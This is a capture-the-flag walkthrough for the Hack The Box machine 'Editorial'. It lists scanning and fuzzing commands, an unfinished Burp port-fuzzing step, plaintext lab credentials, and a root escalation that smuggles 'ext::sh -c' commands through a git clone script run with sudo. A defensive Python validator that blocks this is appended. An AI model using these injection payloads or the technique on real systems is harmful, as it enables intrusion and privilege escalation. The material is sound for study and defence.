Editorial


HTB Linux

nmap -A -p- -oA editorial 10.10.11.20 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA editorial 10.10.11.20

echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts

nmap -sU -O -p- -oA editorial-udp 10.10.11.20

ping -c 1 10.10.11.20

nmap -p- --open -T5 -v -n 10.10.11.20

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts

extractPorts allPorts

nmap -sCV -p22,80 10.10.11.20 -oN targeted

bc targeted -l rb

whatweb http://10.10.11.20

wfuzz -c --hc=404,400,302 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.20/FUZZ

Open Burp Suite and go to http://editorial.htb/upload

Add a file.

And we see the request

Send it to Intruder. Click Add on the $puerto$ (port) part

Go to Payloads and do the following:

Credentials -> dev:dev080217_devAPI!@

ssh dev@10.10.11.20

cd apps

git log

git show b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae

Credentials -> prod:080217_Producti0n_2023!@

su prod

sudo -l

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c touch% /tmp/root'

cat /tmp/root

sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c cat% /root/root.txt% >% /tmp/root'
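
An added defensive example, not code from this writeup or from the script on the box: the two sudo commands above work because the script accepts an `ext::` string as the repository URL, so a clone wrapper should reject git's `<transport>::<address>` remote-helper syntax and anything outside an allowlist before git is invoked. The function names and the https/ssh allowlist are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: this deployment only ever needs to clone over https or ssh.
ALLOWED_SCHEMES = {"https", "ssh"}

# git treats "<transport>::<address>" as a request to run git-remote-<transport>;
# "ext::" is the helper that executes an arbitrary command.
HELPER_PREFIX = re.compile(r"^[A-Za-z0-9][A-Za-z0-9+.-]*::")

# scp-like form "user@host:path"; user and host must start with an alphanumeric
# so the value cannot be read as an ssh option.
SCP_LIKE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9_.-]*@[A-Za-z0-9][A-Za-z0-9.-]*:[A-Za-z0-9_./~-]+$"
)


def validate_clone_url(url: str) -> str:
    """Return url unchanged if it is acceptable for git clone, else raise ValueError."""
    if not url or url != url.strip() or any(c in url for c in "\0\r\n"):
        raise ValueError("empty or malformed URL")
    if url.startswith("-"):
        raise ValueError("value would be parsed as a command-line option")
    if HELPER_PREFIX.match(url):
        raise ValueError("remote-helper syntax (<transport>::) is not allowed")
    if SCP_LIKE.match(url):
        return url
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        raise ValueError(f"scheme {parts.scheme!r} is not allowed")
    return url


def is_safe(url: str) -> bool:
    """Boolean wrapper around validate_clone_url for callers that only need yes/no."""
    try:
        validate_clone_url(url)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample inputs; the first is the argument used in this writeup.
    for sample in ["ext::sh -c touch% /tmp/root",
                   "https://example.com/org/repo.git",
                   "git@example.com:org/repo.git"]:
        print(f"{sample!r}: {'accept' if is_safe(sample) else 'reject'}")
```

Git's own `protocol.allow` and `protocol.<name>.allow` settings restrict transports as well; a script that runs under sudo should not re-enable `ext` and should not take the URL from an unprivileged user.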

© 2024 Cu3rv0x